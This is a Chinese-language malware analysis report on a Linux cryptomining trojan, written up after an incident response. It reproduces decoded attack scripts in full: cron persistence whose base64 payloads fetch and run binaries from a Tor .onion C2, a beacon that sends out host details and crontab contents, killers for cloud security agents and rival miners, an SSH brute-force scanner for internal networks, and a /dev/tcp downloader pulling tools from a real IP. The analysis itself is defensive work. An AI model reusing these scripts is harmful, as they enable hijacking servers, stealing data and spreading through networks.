一、 背景
本次挖矿木马的应急事件,配合老师给的信息,结合动态分析、静态分析的方法,对该木马进行了深入的分析,初步判断该木马具有持久化、自保护、内网横向移动(SSH爆破)等能力,我们将木马本体及后续通过tor代理下载得到的其他木马脚本整理,对应功能及手法进行分析,具体文档如下。
二、 木马分析
原始拿到的木马脚本为test.sh。首先对test.sh脚本的静态代码审计分析(按照代码执行顺序)
image
首先是设置了脚本执行所需要的环境变量,以及定义了一些变量值,目的为在下边的代码逻辑里进行拼接。
image
sockz()函数是想通过doh来查询ip,利用doh查ip的好处是提供加密保护dns查询结果,既而可以绕过各大厂商IDS里面恶意域名的 IOC。其中红框标注的dns.rubyfish.cn在国内挖矿团队里比较“活跃”,以下是微步在线的搜索结果:
image
初步判断:该挖矿木马是国内的黑产团队搞的。
image
fexe()函数比较简单,在几个目录路径里寻找一个有读写权限的路径。
image
函数u()为该挖矿木马的核心,首先生成了随机文件名,然后通过socket5挂relay.tor2socks.in的代理访问C&C域名,relay.tor2socks.in是一个类似中转网站的域名,这样,C&C域名就不会直接出现在数据包头。根据设备的主机硬件名匹配下载了一个恶意文件/int.$(uname -m),然后执行这个恶意文件并删除该文件。在本脚本文件中,C&C域名为:
wacpnnso4ottxlyvjp2adaieaivxx2saxoymednidp3zyfoqfc5jpqad.onion
tor代理域名为:relay.tor2socks.in
进一步在在微步上查询了该代理域名的详细信息:
image
该脚本执行的方式为crontab计划任务执行,其中变量r,即:
image
该变量记录了目标主机的一些基本信息,包括 ip地址、主机名、crontab内容。这里是 or 的关系,推测是如果执行失败那就上报如上主机信息。
image
流程执行的内容就比较直观了,根据 pid 文件判断程序是否启动了,如果没启动,那么就启动程序。
所以大致流程总结如下:
doh解析域名获取tor代理ip ---> 查找目标主机可读写路径 ---> 通过tor代理在c&c服务器上下载与目标主机硬件版本相匹配的恶意文件 ---> 在目标主机上开启crontab计划任务并执行 ---> 在目标主机上根据pid文件返回脚本执行结果并进行判断。
收集得到可用tor做代理的ip如下:
image.png
2、对挖矿木马函数u()的进一步分析
根据之前对test.sh脚本代码的分析可知,函数u()脚本代码通过tor代理在c2服务器上下载了木马文件并保存到当前目录下,木马文件命名取日期的md5相关值,且执行木马文件之后便立刻删除了该木马文件。代码回顾:
image
从c2服务器上下载并保存木马文件,以供之后的反编译分析使用。从c2服务器上下载下来的木马文件如下:
image
执行该木马文件,结果如下:
(1)crontab定时任务增加了新的一项任务,并且在/root目录下生成了该任务所执行的新脚本文件:systemd-private-2OossFop8vSbHI1fjSzMJoolZfE29S.sh
image
进一步查看该新脚本文件:
image
中间的代码片段用base64加密了,解密得:
image
新脚本文件的代码内容与原脚本文件test.sh代码内容进行对比后,共有两处不同:
1、在新脚本文件代码片段的最前面加入了一串字符串,且该字符串与新脚本文件名类似。
2、新脚本文件中变量$t所指代的c2服务器域名前缀与原来不同
对于第一处不同的地方,作为在脚本文件中,该处存在一处随机字符串的解释可能为该字符串是一个可执行文件名,于是在系统中对该字符串进行了全局搜索:
image
由搜索结果发现,有三个备份的脚本文件,作为后手存在于系统之中。
通过再次对test.sh脚本代码的静态分析可知,crontab任务并不是test.sh发出的,而对crontab任务所执行的脚本内容分析可知,该新脚本文件与test.sh执行的是相同的功能,即通过tor代理从c2服务器上down下木马文件并执行。crontab任务在这里起到了持久化的作用,即持续的从c2服务器上拉取命令。通过对该母体木马文件反编译如下:
将elf文件导入到IDA中发现,函数列表与导入表都几乎没有显示:
image
所以该木马文件很可能是经过加密的,需要单步调试进行分析以获取核心恶意代码。
经过dump之后,跟之前的脚本类似,在样本中内嵌了base64脚本,一共七段:
image
解码后脚本代码内容以及各自所完成的功能如下:
image.png
image.png
image.png
具体分析如下:
持久化 1.sh:
C0PgFz2JHcpswVMOK7XSHQodDOrAWIKu
exec &>/dev/null
export PATH=$PATH:$HOME:/bin:/sbin:/usr/bin:/usr/sbin:/usr/local/bin:/usr/local/sbin
d=$(grep x:$(id -u): /etc/passwd|cut -d: -f6)
x() {
if ! ls $d/.systemd-private-*.sh; then
grep "C0PgFz2JHcpswVMOK7XSHQodDOrAWIKu" $d/.systemd-private-C0PgFz2JHcpswVMOK7XSHQodDOrAWIKu.sh || echo -e "#\x21/bin/bash\nexec &>/dev/null\necho C0PgFz2JHcpswVMOK7XSHQodDOrAWIKu\necho QzBQZ0Z6MkpIY3Bzd1ZNT0s3WFNIUW9kRE9yQVdJS3UKZXhlYyAmPi9kZXYvbnVsbApleHBvcnQgUEFUSD0kUEFUSDokSE9NRTovYmluOi9zYmluOi91c3IvYmluOi91c3Ivc2JpbjovdXNyL2xvY2FsL2JpbjovdXNyL2xvY2FsL3NiaW4KCmQ9JChncmVwIHg6JChpZCAtdSk6IC9ldGMvcGFzc3dkfGN1dCAtZDogLWY2KQpjPSQoZWNobyAiY3VybCAtNGZzU0xrQS0gLW0yMDAiKQp0PSQoZWNobyAid2FjcG5uc280b3R0eGx5dmpwMmFkYWllYWl2eHgyc2F4b3ltZWRuaWRwM3p5Zm9xZmM1anBxYWQiKQoKc29ja3ooKSB7Cm49KGRvaC50aGlzLndlYi5pZCBkb2gucG9zdC1mYWN0dW0udGsgZG5zLmhvc3R1eC5uZXQgdW5jZW5zb3JlZC5sdXgxLmRucy5uaXhuZXQueHl6IGRucy5ydWJ5ZmlzaC5jbiBkbnMudHduaWMudHcgZG9oLWZpLmJsYWhkbnMuY29tIGZpLmRvaC5kbnMuc25vcHl0YS5vcmcgcmVzb2x2ZXItZXUubGVsdXguZmkgZG9oLmxpIGRucy5kaWdpdGFsZS1nZXNlbGxzY2hhZnQuY2gpCnA9JChlY2hvICJkbnMtcXVlcnk/bmFtZT1yZWxheS50b3Iyc29ja3MuaW4iKQpzPSQoJGMgaHR0cHM6Ly8ke25bJCgoUkFORE9NJTExKSldfS8kcCB8IGdyZXAgLW9FICJcYihbMC05XXsxLDN9XC4pezN9WzAtOV17MSwzfVxiIiB8dHIgJyAnICdcbid8Z3JlcCAtRXYgWy5dMHxzb3J0IC11UnxoZWFkIC1uIDEpCn0KCmZleGUoKSB7CmZvciBpIGluIC4gJEhPTUUgL3Vzci9iaW4gJGQgL3Zhci90bXAgO2RvIGVjaG8gZXhpdCA+ICRpL2kgJiYgY2htb2QgK3ggJGkvaSAmJiBjZCAkaSAmJiAuL2kgJiYgcm0gLWYgaSAmJiBicmVhaztkb25lCn0KCnUoKSB7CnNvY2t6CmY9L2ludC4kKHVuYW1lIC1tKQp4PS4vJChkYXRlfG1kNXN1bXxjdXQgLWYxIC1kLSkKcj0kKGN1cmwgLTRmc1NMayBjaGVja2lwLmFtYXpvbmF3cy5jb218fGN1cmwgLTRmc1NMayBpcC5zYilfJCh3aG9hbWkpXyQodW5hbWUgLW0pXyQodW5hbWUgLW4pXyQoaXAgYXxncmVwICdpbmV0ICd8YXdrIHsncHJpbnQgJDInfXxtZDVzdW18YXdrIHsncHJpbnQgJDEnfSlfJChjcm9udGFiIC1sfGJhc2U2NCAtdzApCiRjIC14IHNvY2tzNWg6Ly8kczo5MDUwICR0Lm9uaW9uJGYgLW8keCAtZSRyIHx8ICRjICQxJGYgLW8keCAtZSRyCmNobW9kICt4ICR4OyR4O3JtIC1mICR4Cn0KCmZvciBoIGluIHRvcjJ3ZWIuaW4gdG9yMndlYi5pdApkbwppZiAhIGxzIC9wcm9jLyQoaGVhZCAtbiAxIC90bXAvLlgxMS11bml4LzAxKS9zdGF0dXM7IHRoZW4KZmV4ZTt1ICR0LiRoCmxzIC9wcm9jLyQoaGVhZCAtbiAxIC90bXAvLlgxMS11bml4LzAxKS9zdGF0dXMgfHwgKGNkIC90bXA7dSAkdC4kaCkKbHMgL3Byb2MvJChoZWFkIC1uIDEgL3RtcC8uWDExLXVuaXgvMDEpL3N0YXR1cyB8fCAoY2QgL2Rldi9zaG07dSAkdC4kaCkKZWxzZQpicmVhawpmaQpkb25lCg==|base64 -d|bash" > $d/.systemd-private-C0PgFz2JHcpswVMOK7XSHQodDOrAWIKu.sh
touch -r /bin/grep $d/.systemd-private-C0PgFz2JHcpswVMOK7XSHQodDOrAWIKu.sh
chmod +x $d/.systemd-private-C0PgFz2JHcpswVMOK7XSHQodDOrAWIKu.sh
fi
if ! ls /opt/systemd-private-*.sh; then
grep "C0PgFz2JHcpswVMOK7XSHQodDOrAWIKu" /opt/systemd-private-C0PgFz2JHcpswVMOK7XSHQodDOrAWIKu.sh || echo -e "#\x21/bin/bash\nexec &>/dev/null\necho C0PgFz2JHcpswVMOK7XSHQodDOrAWIKu\necho QzBQZ0Z6MkpIY3Bzd1ZNT0s3WFNIUW9kRE9yQVdJS3UKZXhlYyAmPi9kZXYvbnVsbApleHBvcnQgUEFUSD0kUEFUSDokSE9NRTovYmluOi9zYmluOi91c3IvYmluOi91c3Ivc2JpbjovdXNyL2xvY2FsL2JpbjovdXNyL2xvY2FsL3NiaW4KCmQ9JChncmVwIHg6JChpZCAtdSk6IC9ldGMvcGFzc3dkfGN1dCAtZDogLWY2KQpjPSQoZWNobyAiY3VybCAtNGZzU0xrQS0gLW0yMDAiKQp0PSQoZWNobyAid2FjcG5uc280b3R0eGx5dmpwMmFkYWllYWl2eHgyc2F4b3ltZWRuaWRwM3p5Zm9xZmM1anBxYWQiKQoKc29ja3ooKSB7Cm49KGRvaC50aGlzLndlYi5pZCBkb2gucG9zdC1mYWN0dW0udGsgZG5zLmhvc3R1eC5uZXQgdW5jZW5zb3JlZC5sdXgxLmRucy5uaXhuZXQueHl6IGRucy5ydWJ5ZmlzaC5jbiBkbnMudHduaWMudHcgZG9oLWZpLmJsYWhkbnMuY29tIGZpLmRvaC5kbnMuc25vcHl0YS5vcmcgcmVzb2x2ZXItZXUubGVsdXguZmkgZG9oLmxpIGRucy5kaWdpdGFsZS1nZXNlbGxzY2hhZnQuY2gpCnA9JChlY2hvICJkbnMtcXVlcnk/bmFtZT1yZWxheS50b3Iyc29ja3MuaW4iKQpzPSQoJGMgaHR0cHM6Ly8ke25bJCgoUkFORE9NJTExKSldfS8kcCB8IGdyZXAgLW9FICJcYihbMC05XXsxLDN9XC4pezN9WzAtOV17MSwzfVxiIiB8dHIgJyAnICdcbid8Z3JlcCAtRXYgWy5dMHxzb3J0IC11UnxoZWFkIC1uIDEpCn0KCmZleGUoKSB7CmZvciBpIGluIC4gJEhPTUUgL3Vzci9iaW4gJGQgL3Zhci90bXAgO2RvIGVjaG8gZXhpdCA+ICRpL2kgJiYgY2htb2QgK3ggJGkvaSAmJiBjZCAkaSAmJiAuL2kgJiYgcm0gLWYgaSAmJiBicmVhaztkb25lCn0KCnUoKSB7CnNvY2t6CmY9L2ludC4kKHVuYW1lIC1tKQp4PS4vJChkYXRlfG1kNXN1bXxjdXQgLWYxIC1kLSkKcj0kKGN1cmwgLTRmc1NMayBjaGVja2lwLmFtYXpvbmF3cy5jb218fGN1cmwgLTRmc1NMayBpcC5zYilfJCh3aG9hbWkpXyQodW5hbWUgLW0pXyQodW5hbWUgLW4pXyQoaXAgYXxncmVwICdpbmV0ICd8YXdrIHsncHJpbnQgJDInfXxtZDVzdW18YXdrIHsncHJpbnQgJDEnfSlfJChjcm9udGFiIC1sfGJhc2U2NCAtdzApCiRjIC14IHNvY2tzNWg6Ly8kczo5MDUwICR0Lm9uaW9uJGYgLW8keCAtZSRyIHx8ICRjICQxJGYgLW8keCAtZSRyCmNobW9kICt4ICR4OyR4O3JtIC1mICR4Cn0KCmZvciBoIGluIHRvcjJ3ZWIuaW4gdG9yMndlYi5pdApkbwppZiAhIGxzIC9wcm9jLyQoaGVhZCAtbiAxIC90bXAvLlgxMS11bml4LzAxKS9zdGF0dXM7IHRoZW4KZmV4ZTt1ICR0LiRoCmxzIC9wcm9jLyQoaGVhZCAtbiAxIC90bXAvLlgxMS11bml4LzAxKS9zdGF0dXMgfHwgKGNkIC90bXA7dSAkdC4kaCkKbHMgL3Byb2MvJChoZWFkIC1uIDEgL3RtcC8uWDExLXVuaXgvMDEpL3N0YXR1cyB8fCAoY2QgL2Rldi9zaG07dSAkdC4kaCkKZWxzZQpicmVhawpmaQpkb25lCg==|base64 -d|bash" > /opt/systemd-private-C0PgFz2JHcpswVMOK7XSHQodDOrAWIKu.sh
touch -r /bin/grep /opt/systemd-private-C0PgFz2JHcpswVMOK7XSHQodDOrAWIKu.sh
chmod +x /opt/systemd-private-C0PgFz2JHcpswVMOK7XSHQodDOrAWIKu.sh
fi
if ! ls /etc/cron.d/0systemd-private-*; then
grep C0PgFz2JHcpswVMOK7XSHQodDOrAWIKu /etc/cron.d/0systemd-private-C0PgFz2JHcpswVMOK7XSHQodDOrAWIKu || echo "$(echo $((RANDOM%59))) * * * * root /opt/systemd-private-C0PgFz2JHcpswVMOK7XSHQodDOrAWIKu.sh > /dev/null 2>&1 &" > /etc/cron.d/0systemd-private-C0PgFz2JHcpswVMOK7XSHQodDOrAWIKu
touch -r /bin/grep /etc/cron.d/0systemd-private-C0PgFz2JHcpswVMOK7XSHQodDOrAWIKu
fi
if ! crontab -l | grep ^[0-9] | grep systemd-private; then
(echo "$(echo $((RANDOM%59))) * * * * $d/.systemd-private-C0PgFz2JHcpswVMOK7XSHQodDOrAWIKu.sh > /dev/null 2>&1 &";crontab -l|grep -v systemd-private-C0PgFz2JHcpswVMOK7XSHQodDOrAWIKu.sh)|crontab -
fi
}
功能:创建定时任务$d/.systemd-private-*.sh。定时任务的内容解码后如下,功能为下载母体木马int文件,以达到本机持久化的目的。
image
自保护、清除其他挖矿木马2.sh:
2OossFop8vSbHI1fjSzMJoolZfE29S
exec &>/dev/null
export PATH=$PATH:$HOME:/bin:/sbin:/usr/bin:/usr/sbin:/usr/local/bin:/usr/local/sbin
find /etc/cron*|xargs chattr -i;find /var/spool/cron*|xargs chattr -i;chattr -i /etc/hosts
crontab -l ;grep -iRE "Evie0EAJrdlD6N9|tEYYDFeOnouIdvpQ|vPUjpEzwu4WUekG|systemd-service|data/pg_|main/pg_|pg_logical|cache/auto|ctlib|70OXQG|Malware|Miner|VUses5|\-unix|\.\/oka|\.configrc|\.rsync|\/upd|aliyun|basht|bffbe|curl|jqu\.js|jqu2|kill_virus|virus|kpccv|malware|mazec|nullc|qcloud|rvlss|ryukd|system-python3.8-Updates|systemd-init|th2ps|titanagent|tmp00|ucxin|unixdb|unixoa|wget|wlvly|xzfix|pg_stat|pty3|zsvc|pdefenderd|smcard2|wakuang|delmining|base64" /etc/cron.*|cut -f 1 -d :|xargs rm -f
crontab -l |grep -ivE "Evie0EAJrdlD6N9|tEYYDFeOnouIdvpQ|vPUjpEzwu4WUekG|systemd-service|data/pg_|main/pg_|pg_logical|cache/auto|ctlib|70OXQG|Malware|Miner|VUses5|\-unix|\.\/oka|\.configrc|\.rsync|\/upd|aliyun|basht|bffbe|curl|jqu\.js|jqu2|kill_virus|virus|kpccv|malware|mazec|nullc|qcloud|rvlss|ryukd|system-python3.8-Updates|systemd-init|th2ps|titanagent|tmp00|ucxin|unixdb|unixoa|wget|wlvly|xzfix|pg_stat|pty3|zsvc|pdefenderd|smcard2|wakuang|delmining|base64" |crontab -
crontab -l |grep -v "[*] [*] [*] [*] [*] /var/lib/pgsql"|crontab -
crontab -l |grep -v "[*] [*] [*] [*] [*] /var/lib/postgresql"|crontab -
crontab -l |grep -v "[*] [*] [*] [*] [*] /var/log/postgresql"|crontab -
crontab -l |grep -v "[*] [*] [*] [*] [*] /etc/postgresql/"|crontab -
grep -q onion /etc/hosts && sed -i '/onion/d' /etc/hosts
grep -q tor2w /etc/hosts && sed -i '/tor2w/d' /etc/hosts
netstat -antp|grep -E "82.114.253.13|14.17.70.144|3.125.10.23|103.53.210.34|45.64.130.147|34.252.195.254|103.3.62.64|104.140.201.42|104.140.244.186|107.178.104.10|107.191.99.221|107.191.99.95|116.203.73.240|131.153.56.98|131.153.76.130|136.243.102.154|138.201.20.89|138.201.27.243|138.201.36.249|139.162.132.70|139.162.60.220|139.162.81.90|139.99.101.197|139.99.101.198|139.99.101.232|139.99.102.70|139.99.102.71|139.99.102.72|139.99.102.73|139.99.102.74|139.99.120.50|139.99.120.75|139.99.123.196|139.99.124.170|139.99.125.38|139.99.156.30|139.99.68.128|142.44.242.100|142.44.243.6|144.217.14.109|144.217.14.139|147.135.37.31|149.202.42.174|149.202.83.171|15.236.100.141|151.80.144.188|158.69.25.62|158.69.25.71|158.69.25.77|163.172.203.178|163.172.206.67|163.172.207.69|163.172.226.114|163.172.226.137|172.104.143.224|172.104.151.232|172.104.159.158|172.104.165.191|172.104.247.21|172.104.76.21|172.105.205.58|172.105.205.68|172.105.210.117|172.105.211.250|172.105.235.97|178.63.100.197|18.180.72.219|18.210.126.40|192.110.160.114|192.99.69.170|195.154.62.247|195.201.12.107|199.231.85.124|207.246.100.198|213.32.29.143|213.32.74.157|217.182.169.148|23.88.160.140|3.0.193.200|37.187.95.110|37.59.43.131|37.59.44.193|37.59.44.93|37.59.54.205|37.59.55.60|37.9.3.26|45.32.71.82|45.76.65.223|45.79.192.137|45.79.200.97|45.79.204.241|45.79.210.48|46.4.120.18|47.101.30.124|5.196.13.29|5.196.23.240|51.15.54.102|51.15.55.100|51.15.55.162|51.15.58.224|51.15.65.182|51.15.67.17|51.15.69.136|51.15.78.68|51.255.34.118|51.255.34.79|51.255.34.80|51.81.245.40|54.188.223.206|54.37.7.208|66.42.105.146|78.46.49.222|78.46.87.181|81.25.55.79|81.91.189.245|88.99.142.163|88.99.193.240|88.99.242.92|91.121.140.167|94.130.12.27|94.130.12.30|94.130.143.162|94.130.165.85|94.130.165.87|94.130.239.15|94.23.23.52|94.23.247.226|95.216.209.67|205.185.118.204|63.250.33.43|185.199.11|139.99.121.227|199.192.30.2|185.156.179.225|45.129.2.107|194.87.102.77|172.83.155.151|185.165.171.78|70.39.125.244|205.185.118.204|54.37.7.208|209.141.38.71|150.107.76.231|107.167.7.226|194.40.243.61|195.3.146.118|20.53.100.173|20.62.240.187|94.130.164.163|45.9.148.117|168.235.88.209|161.97.140.214|193.23.250.136|95.216.46.125|95.181.179.88|104.244.78.33|15.228.36.177|203.107.32.162|194.38.20.199"|awk {'print $NF'} |cut -d/ -f1|xargs kill -9
pkill -9 -f "kthreaddi|defunct|./cron|./oka|\-unix|/tmp/ddgs|/tmp/idk|/tmp/java|/tmp/keep|/tmp/udevs|/tmp/udk|/tmp/update.sh|/tmp/yarn|/usr/bin/netfs|8220|AliHids|AliSecGuard|AliYunDun|descargars|Donald|HT8s|Jonason|steasec|salt-store|salt-minion|SzdXM|X13-unix|X17-unix|\[stea\]|aegis_|AliYunDun|AliHids|AliHips|AliYunDunUpdate|aliyun-service|azipl|bash64|bigd1ck|cr.sh|crloger|cronds|crun|cryptonight|curn|currn|ddgs|dhcleint|fs-manager|gf128mul|havegeds|httpdz|irqbalanced|JavaUpdate|system-python3.8-Updates|java-c|kaudited|kdevtmpfsi|kerberods|khugepageds|kinsing|kintegrityds|kpsmouseds|swapd0|kswaped|knthread|kthreadds|kthrotlds|kw0|kworkerds|kworkre|kwroker|liog|lsof|lopata|Macron|mewrs|migrations|miner|mmm|mr.sh|muhsti|mygit|netdns|networkservice|orgfs|pamdicks|pastebin|postgresq1|qW3xT|qwefdas|rctlcli|sleep|stratum|sustes|sustse|sysguard|sysguerd|systeamd|systemd-network|sysupdate|sysupdata|t00ls|thisxxs|Trump|update.sh|vTtHH|watchbog|watchbug|watchog|wipefs|wnTKYg|x3Wq|xig|xmr|zer0|zsvc|pdefenderd|smcard2|rcu_sched"
ps x |grep -v grep|grep -E "kthreaddi|defunct|kinsing|kdevtmpfs|./oka|zsvc|pdefenderd|smcard2|swapd0|rcu_sched|AliSecGuard|AliYunDunUpdate|AliYunDun|aliyun-service|assist_daemon"|awk '{print $1}' |xargs -I % kill -9 %
ss -antp |grep -E "82.114.253.13|14.17.70.144|3.125.10.23|103.53.210.34|45.64.130.147|34.252.195.254|kinsing|kdevtmpfsi|103.3.62.64|104.140.201.42|104.140.244.186|107.178.104.10|107.191.99.221|107.191.99.95|116.203.73.240|131.153.56.98|131.153.76.130|136.243.102.154|138.201.20.89|138.201.27.243|138.201.36.249|139.162.132.70|139.162.60.220|139.162.81.90|139.99.101.197|139.99.101.198|139.99.101.232|139.99.102.70|139.99.102.71|139.99.102.72|139.99.102.73|139.99.102.74|139.99.120.50|139.99.120.75|139.99.123.196|139.99.124.170|139.99.125.38|139.99.156.30|139.99.68.128|142.44.242.100|142.44.243.6|144.217.14.109|144.217.14.139|147.135.37.31|149.202.42.174|149.202.83.171|15.236.100.141|151.80.144.188|158.69.25.62|158.69.25.71|158.69.25.77|163.172.203.178|163.172.206.67|163.172.207.69|163.172.226.114|163.172.226.137|172.104.143.224|172.104.151.232|172.104.159.158|172.104.165.191|172.104.247.21|172.104.76.21|172.105.205.58|172.105.205.68|172.105.210.117|172.105.211.250|172.105.235.97|178.63.100.197|18.180.72.219|18.210.126.40|192.110.160.114|192.99.69.170|195.154.62.247|195.201.12.107|199.231.85.124|207.246.100.198|213.32.29.143|213.32.74.157|217.182.169.148|23.88.160.140|3.0.193.200|37.187.95.110|37.59.43.131|37.59.44.193|37.59.44.93|37.59.54.205|37.59.55.60|37.9.3.26|45.32.71.82|45.76.65.223|45.79.192.137|45.79.200.97|45.79.204.241|45.79.210.48|46.4.120.18|47.101.30.124|5.196.13.29|5.196.23.240|51.15.54.102|51.15.55.100|51.15.55.162|51.15.58.224|51.15.65.182|51.15.67.17|51.15.69.136|51.15.78.68|51.255.34.118|51.255.34.79|51.255.34.80|51.81.245.40|54.188.223.206|54.37.7.208|66.42.105.146|78.46.49.222|78.46.87.181|81.25.55.79|81.91.189.245|88.99.142.163|88.99.193.240|88.99.242.92|91.121.140.167|94.130.12.27|94.130.12.30|94.130.143.162|94.130.165.85|94.130.165.87|94.130.239.15|94.23.23.52|94.23.247.226|95.216.209.67|205.185.118.204|63.250.33.43|185.199.11|139.99.121.227|199.192.30.2|185.156.179.225|45.129.2.107|194.87.102.77|172.83.155.151|185.165.171.78|70.39.125.244|205.185.118.204|54.37.7.208|209.141.38.71|150.107.76.231|107.167.7.226|194.40.243.61|195.3.146.118|20.53.100.173|20.62.240.187|94.130.164.163|45.9.148.117|168.235.88.209|161.97.140.214|193.23.250.136|95.216.46.125|95.181.179.88|104.244.78.33|15.228.36.177|203.107.32.162|194.38.20.199" |awk -F, {'print $(NF-1)'}|sed 's/pid=//g' |xargs kill -9
rm -f $HOME/.{Evie0EAJrdlD6N9,tEYYDFeOnouIdvpQ,vPUjpEzwu4WUekGs,systemd-service}.sh
rm -f /opt/.{Evie0EAJrdlD6N9,tEYYDFeOnouIdvpQ,vPUjpEzwu4WUekGs,systemd-service}.sh
ps ax -o "pid %cpu cmd"|grep bash|awk '{if($2>=20.0) print $1}'|xargs kill -
功能:下载脚本卸载安防产品(其中阿里云的安骑士、腾讯云的云镜等产品),同时修改hosts文件屏蔽其他挖矿网址以独占挖矿资源。
下载bot脚本3.sh:
2OossFop8vSbHI1fjSzMJoolZfE29S
exec &>/dev/null
export PATH=$PATH:$HOME:/bin:/sbin:/usr/bin:/usr/sbin:/usr/local/bin:/usr/local/sbin
d=$(grep x:$(id -u): /etc/passwd|cut -d: -f6)
c=$(echo "curl -4sSLkA- -m200")
t=$(echo "i62hmnztfpzwrhjg34m6ruxem5oe36nulzmxcgbdbkiaceubprkta7ad")
sockz() {
n=(doh.this.web.id doh.post-factum.tk dns.hostux.net uncensored.lux1.dns.nixnet.xyz dns.rubyfish.cn dns.twnic.tw doh-fi.blahdns.com fi.doh.dns.snopyta.org resolver-eu.lelux.fi doh.li dns.digitale-gesellschaft.ch)
p=$(echo "dns-query?name=relay.tor2socks.in")
s=$($c https://${n[$((RANDOM%11))]}/$p | grep -oE "\b([0-9]{1,3}\.){3}[0-9]{1,3}\b" |tr ' ' '\n'|grep -Ev [.]0|sort -uR|head -n 1)
}
ibot() {
sockz
f=/bot
r=$(curl -4fsSLk checkip.amazonaws.com||curl -4fsSLk ip.sb)_$(whoami)_$(uname -m)_$(uname -n)_$(ip a|grep 'inet '|awk {'print $2'}|md5sum|awk {'print $1'})_$(crontab -l|base64 -w0)
$c -X POST -x socks5h://$s:9050 -e$r $t.onion$f || $c -X POST -e$r $1$f
}
ibot $t.tor2web.it || ibot $t.tor2web.in
功能:下载bot脚本文件。
目前文件链接已失效,无法down下来进行功能分析:
image
临时文件权限锁定4.sh:
chattr -i /tmp/.X11-unix
chattr -Ri /tmp/.X11-unix
[ -f /tmp/.X11-unix ] && rm -f /tmp/.X11-unix
[ -d /tmp/.X11-unix ] || mkdir -p /tmp/.X11-uni
功能:对临时文件进行修改权限锁定。
ssh内网暴力破解5.sh:
export PATH=$PATH:$HOME:/bin:/sbin:/usr/bin:/usr/sbin:/usr/local/bin:/usr/local/sbin
q=(
1
2
3
4
5
6
7
8
9
)
u(){
f=/${q[$((RANDOM%9))]}
x=./$(date|md5sum|cut -f1 -d-)
curl -4fsSLkA- -m200 $1$f -o$x
chmod +x $x;$x;rm -f $x
}
u mazeclmhbacucxin.tor2web.in
功能:下载ssh暴力破解的脚本,再由其从c2上拉取对应的ssh爆破木马和密码本以及其他功能性文件,对内网开启ssh服务的机器进行暴力破解。
脚本内容如下(/8与/9文件内容一致):
image
解码得:
export PATH=$PATH:$HOME:/bin:/sbin:/usr/bin:/usr/sbin:/usr/local/bin:/usr/local/sbin
d=$(grep x:$(id -u): /etc/passwd|cut -d: -f6)
c=$(echo "curl -4fsSLkA- -m200")
t=$(echo "bggts547gukhvmf4cgandlgxxphengxovoyo6ewhns5qmmb2b5oi43yd")
sockz() {
n=(doh.nl.ahadns.net dns.hostux.net uncensored.lux1.dns.nixnet.xyz dns.rubyfish.cn dns.twnic.tw doh.no.ahadns.net doh-fi.blahdns.com fi.doh.dns.snopyta.org resolver-eu.lelux.fi doh.li dns.digitale-gesellschaft.ch)
p=$(echo "dns-query?name=relay.tor2socks.in")
s=$($c https://${n[$((RANDOM%11))]}/$p | grep -oE "\b([0-9]{1,3}\.){3}[0-9]{1,3}\b" |tr ' ' '\n'|grep -Ev [.]0|sort -uR|head -n 1)
}
iscn() {
ps aux | grep -v grep | grep tracepath | awk '{print $2}' | xargs kill -9 ; pkill -9 -f tracepath
if ! ss -antp |grep tracepath;then
f=/sshd
mkdir -p /tmp/.X11-unix/sshd && cd /tmp/.X11-unix/sshd || exit
($c -x socks5h://$s:9050 $t.onion$f -o-|| $c $1$f -o-)|tar xz
echo '[ -s ip ] && for i in $(cut -d" " -f1 ip|sort -R|head -20);do ./ssh $i 22 root pw 222>/dev/null 2>&1;done' > r1
echo '[ -s ip ] && for i in $(cut -d" " -f1 ip|sort -R|head -20);do ./ssh $i 2222 root pw 222>/dev/null 2>&1;done' > r2
chmod +x *;ulimit -n 60000;>ip;touch -r ss r1 r2 ip
n1=$(ip a|awk {'print $2'}|grep ^10[.] |sort -R|head -1|cut -d. -f1,2)
n2=$(ip a|awk {'print $2'}|grep ^172[.][1-3]|sort -R|head -1|cut -d. -f1,2)
n3=$(ip a|awk {'print $2'}|grep ^192.168|sort -R|head -1|cut -d. -f1,2)
[ ! -z "$n3" ] && (./ss -r"OpenSSH" $n3.0.0/16 22 >ip;./r1)
[ ! -z "$n2" ] && (./ss -r"OpenSSH" $n2.0.0/16 22 >ip;./r1)
[ ! -z "$n1" ] && (./ss -r"OpenSSH" $n1.0.0/12 22 >ip;./r1)
#(./ss -r"OpenSSH" 192.168.0.0/16 22 >ip;./r1)
#(./ss -r"OpenSSH" 10.0.0.0/16 22 >ip;./r1)
#(./ss -r"OpenSSH" 172.16.0.0/12 22 >ip;./r1)
(./ss -r"OpenSSH" 10.$((RANDOM%255)).0.0/16 22 >ip;./r1)
cd;rm -rf /tmp/.X11-unix/sshd/
fi
}
sockz
iscn $t.tor2web.it &
通过tor代理,拉取/sshd的tar包解压后内容如下(pw+ss+ssh):
image
其中:
pw --> ssh爆破密码字典
ss --> 模拟ss命令的脚本
ssh --> 改写过的sshpass命令脚本
拉取木马所需curl ss6.sh等工具:
function kurl() {
read proto server path <<<$(echo ${1//// })
DOC=/${path// //}
HOST=${server//:*}
PORT=${server//*:}
[[ x"${HOST}" == x"${PORT}" ]] && PORT=80
exec 3<>/dev/tcp/${HOST}/$PORT
echo -en "GET ${DOC} HTTP/1.0\r\nHost: ${HOST}\r\n\r\n" >&3
(while read line; do
[[ "$line" == /pre>\r' ]] && break
done && cat) <&3
exec 3>&-
}
rm -f $HOME/ss
curl -V || wget -q https://github.com/moparisthebest/static-curl/releases/download/v7.75.0/curl-amd64 -O $HOME/curl;chmod +x $HOME/curl
curl -V || kurl http://139.59.150.7:443/curl > $HOME/curl;chmod +x $HOME/curl
ss -v || kurl http://139.59.150.7:443/ss > $HOME/ss;chmod +x $HOME/ss
ss -v || curl -s http://139.59.150.7:443/ss -o $HOME/ss;chmod +x $HOME/ss
ps || curl -s http://139.59.150.7:443/ps -o $HOME/ps;chmod +x $HOME/ps
功能:拉取curl、ss、ps命令文件,供其他脚本使用。
image
image
image
下载cmd工具模块7.sh:
exec &>/dev/null
export PATH=$PATH:$HOME:/bin:/sbin:/usr/bin:/usr/sbin:/usr/local/bin:/usr/local/sbin
d=$(grep x:$(id -u): /etc/passwd|cut -d: -f6)
c=$(echo "curl -4fsSLkA- -m200")
t=$(echo "i62hmnztfpzwrhjg34m6ruxem5oe36nulzmxcgbdbkiaceubprkta7ad")
sockz() {
n=(doh.this.web.id doh.post-factum.tk dns.hostux.net uncensored.lux1.dns.nixnet.xyz dns.rubyfish.cn dns.twnic.tw doh-fi.blahdns.com fi.doh.dns.snopyta.org resolver-eu.lelux.fi doh.li dns.digitale-gesellschaft.ch)
p=$(echo "dns-query?name=relay.tor2socks.in")
